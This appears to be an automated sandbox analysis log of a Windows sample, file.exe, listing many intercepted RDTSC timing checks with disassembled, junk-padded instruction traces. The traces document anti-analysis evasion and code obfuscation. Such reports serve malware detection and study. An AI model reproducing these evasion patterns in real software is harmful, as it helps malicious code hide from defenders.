Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D807AD second address: 4D807C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A8838C84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D807C5 second address: 4D80822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushfd 0x00000011 jmp 00007F45A84F3301h 0x00000016 sbb esi, 5DAE3746h 0x0000001c jmp 00007F45A84F3301h 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F45A84F32FEh 0x0000002a and esp, FFFFFFF8h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov dl, 78h 0x00000032 mov dx, si 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80822 second address: 4D80848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d call 00007F45A8838C82h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80848 second address: 4D80850 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80850 second address: 4D8086A instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45A8838C80h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8086A second address: 4D80924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45A84F3301h 0x00000009 xor ax, BCC6h 0x0000000e jmp 00007F45A84F3301h 0x00000013 popfd 0x00000014 mov cx, FD77h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c jmp 00007F45A84F32FAh 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 mov ax, B8BDh 0x00000027 movzx ecx, di 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F45A84F3304h 0x00000031 xchg eax, esi 0x00000032 jmp 00007F45A84F3300h 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a jmp 00007F45A84F3300h 0x0000003f sub ebx, ebx 0x00000041 pushad 0x00000042 mov edi, 59231D72h 0x00000047 mov si, bx 0x0000004a popad 0x0000004b test esi, esi 0x0000004d pushad 0x0000004e mov eax, edi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushfd 0x00000053 jmp 00007F45A84F32FDh 0x00000058 sbb esi, 49384246h 0x0000005e jmp 00007F45A84F3301h 0x00000063 popfd 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80924 second address: 4D80960 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4E73B4F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F461A9DE6D6h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F45A8838C86h 0x00000019 sub ecx, 46E3DA18h 0x0000001f jmp 00007F45A8838C7Bh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80960 second address: 4D8097D instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, edx 0x00000009 popad 0x0000000a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F45A84F32FAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8097D second address: 4D8098F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A8838C7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8098F second address: 4D809A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 mov cx, dx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D809A3 second address: 4D80A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F461A9DE664h 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 mov di, cx 0x00000016 popad 0x00000017 mov ecx, 107CFC95h 0x0000001c popad 0x0000001d test byte ptr [76FB6968h], 00000002h 0x00000024 jmp 00007F45A8838C80h 0x00000029 jne 00007F461A9DE64Ch 0x0000002f pushad 0x00000030 jmp 00007F45A8838C7Eh 0x00000035 mov di, si 0x00000038 popad 0x00000039 mov edx, dword ptr [ebp+0Ch] 0x0000003c pushad 0x0000003d jmp 00007F45A8838C7Ah 0x00000042 mov cx, EF61h 0x00000046 popad 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A13 second address: 4D80A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A17 second address: 4D80A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A1B second address: 4D80A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A21 second address: 4D80A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A27 second address: 4D80A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A2B second address: 4D80A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F45A8838C89h 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edi, 7B5CDE6Eh 0x00000017 pushfd 0x00000018 jmp 00007F45A8838C7Fh 0x0000001d adc si, BF1Eh 0x00000022 jmp 00007F45A8838C89h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A86 second address: 4D80AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d pushad 0x0000000e jmp 00007F45A84F3300h 0x00000013 pushfd 0x00000014 jmp 00007F45A84F3302h 0x00000019 jmp 00007F45A84F3305h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F45A84F3301h 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80AE6 second address: 4D80AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80B4A second address: 4D80B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80B4E second address: 4D80B6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80B6B second address: 4D80B90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F45A84F3305h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80B90 second address: 4D80BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80BA3 second address: 4D80BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F45A84F32FDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10687 second address: 4E106E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F45A8838C7Fh 0x00000008 pop ecx 0x00000009 mov bh, 1Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dh, cl 0x00000012 push ebx 0x00000013 mov eax, 4331F375h 0x00000018 pop eax 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F45A8838C80h 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 mov cx, 6A9Dh 0x00000026 call 00007F45A8838C7Ah 0x0000002b mov edi, ecx 0x0000002d pop esi 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 jmp 00007F45A8838C7Dh 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E106E5 second address: 4E106EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E0099F second address: 4E009A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E009A3 second address: 4E009A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E009A7 second address: 4E009AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00779 second address: 4E0078B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A84F32FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E0078B second address: 4E0078F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E0078F second address: 4E0083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushad 0x0000000b mov bl, al 0x0000000d call 00007F45A84F3305h 0x00000012 pop eax 0x00000013 popad 0x00000014 push edx 0x00000015 mov esi, 79ED35A3h 0x0000001a pop eax 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F45A84F3305h 0x00000026 adc ecx, 48744FA6h 0x0000002c jmp 00007F45A84F3301h 0x00000031 popfd 0x00000032 push eax 0x00000033 pushfd 0x00000034 jmp 00007F45A84F3307h 0x00000039 sbb ecx, 3BFFC2DEh 0x0000003f jmp 00007F45A84F3309h 0x00000044 popfd 0x00000045 pop eax 0x00000046 popad 0x00000047 mov ebp, esp 0x00000049 pushad 0x0000004a mov dl, al 0x0000004c popad 0x0000004d pop ebp 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F45A84F32FEh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E0083F second address: 4E00845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00845 second address: 4E00849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00849 second address: 4E0084D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA002F second address: 4DA004F instructions: 0x00000000 rdtsc 0x00000002 mov esi, 7DD7CA01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F45A84F3303h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA004F second address: 4DA007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 24h 0x00000005 pushfd 0x00000006 jmp 00007F45A8838C80h 0x0000000b and al, 00000078h 0x0000000e jmp 00007F45A8838C7Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA007D second address: 4DA0084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0084 second address: 4DA00FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F45A8838C84h 0x00000011 adc ecx, 70374638h 0x00000017 jmp 00007F45A8838C7Bh 0x0000001c popfd 0x0000001d mov ax, 146Fh 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F45A8838C82h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F45A8838C87h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA00FB second address: 4DA0113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A84F3304h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00C26 second address: 4E00C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F45A8838C80h 0x00000011 push dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F45A8838C7Dh 0x0000001c push ecx 0x0000001d pop edi 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00C63 second address: 4E00CAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F45A84F32F9h 0x0000000e pushad 0x0000000f mov bh, ch 0x00000011 mov ax, bx 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007F45A84F3302h 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F45A84F32FDh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00CAC second address: 4E00CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00CB0 second address: 4E00CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00CB6 second address: 4E00CED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F45A8838C7Bh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F45A8838C84h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00D3E second address: 4E00D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00D43 second address: 4E00D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F45A8838C87h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d movzx eax, al 0x00000010 pushad 0x00000011 mov ecx, ebx 0x00000013 mov ax, di 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F45A8838C85h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00D86 second address: 4E00D9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB063E second address: 4DB0643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0643 second address: 4DB068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f jmp 00007F45A84F32FEh 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F45A84F3307h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB068E second address: 4DB0743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F45A8838C81h 0x0000000f nop 0x00000010 jmp 00007F45A8838C7Eh 0x00000015 sub esp, 1Ch 0x00000018 pushad 0x00000019 jmp 00007F45A8838C7Eh 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F45A8838C80h 0x00000025 xor ecx, 42CCCD18h 0x0000002b jmp 00007F45A8838C7Bh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007F45A8838C88h 0x00000037 add si, B778h 0x0000003c jmp 00007F45A8838C7Bh 0x00000041 popfd 0x00000042 popad 0x00000043 popad 0x00000044 xchg eax, ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F45A8838C80h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0743 second address: 4DB0752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0752 second address: 4DB076A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A8838C84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB076A second address: 4DB076E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB076E second address: 4DB07C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F45A8838C7Ch 0x00000010 add eax, 1C998368h 0x00000016 jmp 00007F45A8838C7Bh 0x0000001b popfd 0x0000001c movzx ecx, bx 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F45A8838C7Bh 0x00000026 xchg eax, esi 0x00000027 jmp 00007F45A8838C86h 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB07C5 second address: 4DB07CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB07CB second address: 4DB084A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F45A8838C86h 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 push ecx 0x00000012 call 00007F45A8838C7Dh 0x00000017 pop ecx 0x00000018 pop edi 0x00000019 pushfd 0x0000001a jmp 00007F45A8838C7Eh 0x0000001f add ecx, 5292ECE8h 0x00000025 jmp 00007F45A8838C7Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push eax 0x0000002d jmp 00007F45A8838C89h 0x00000032 xchg eax, edi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB084A second address: 4DB0850 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0850 second address: 4DB0856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0856 second address: 4DB085A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB085A second address: 4DB085E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB085E second address: 4DB0870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FBB370h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0870 second address: 4DB0879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 9466h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0879 second address: 4DB08AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007F45A84F3300h 0x00000011 xor eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F45A84F32FCh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB08AC second address: 4DB08B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB08B2 second address: 4DB08B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB08B6 second address: 4DB08EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F45A8838C7Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F45A8838C7Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB08EA second address: 4DB08FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB08FF second address: 4DB094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c mov edx, 3E3DAB28h 0x00000011 pushfd 0x00000012 jmp 00007F45A8838C81h 0x00000017 add ecx, 71B60896h 0x0000001d jmp 00007F45A8838C81h 0x00000022 popfd 0x00000023 popad 0x00000024 lea eax, dword ptr [ebp-10h] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F45A8838C7Dh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB094D second address: 4DB0984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx edx, ax 0x00000015 call 00007F45A84F3304h 0x0000001a pop eax 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0984 second address: 4DB0A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F45A8838C7Ah 0x0000000b sbb si, DD78h 0x00000010 jmp 00007F45A8838C7Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, dword ptr [ebp+08h] 0x0000001c jmp 00007F45A8838C86h 0x00000021 mov eax, dword ptr [esi+10h] 0x00000024 pushad 0x00000025 mov ax, E56Dh 0x00000029 popad 0x0000002a test eax, eax 0x0000002c jmp 00007F45A8838C84h 0x00000031 jne 00007F461A947FBAh 0x00000037 jmp 00007F45A8838C80h 0x0000003c sub eax, eax 0x0000003e jmp 00007F45A8838C81h 0x00000043 mov dword ptr [ebp-20h], eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov di, 34AEh 0x0000004d jmp 00007F45A8838C7Fh 0x00000052 popad 0x00000053 rdtsc
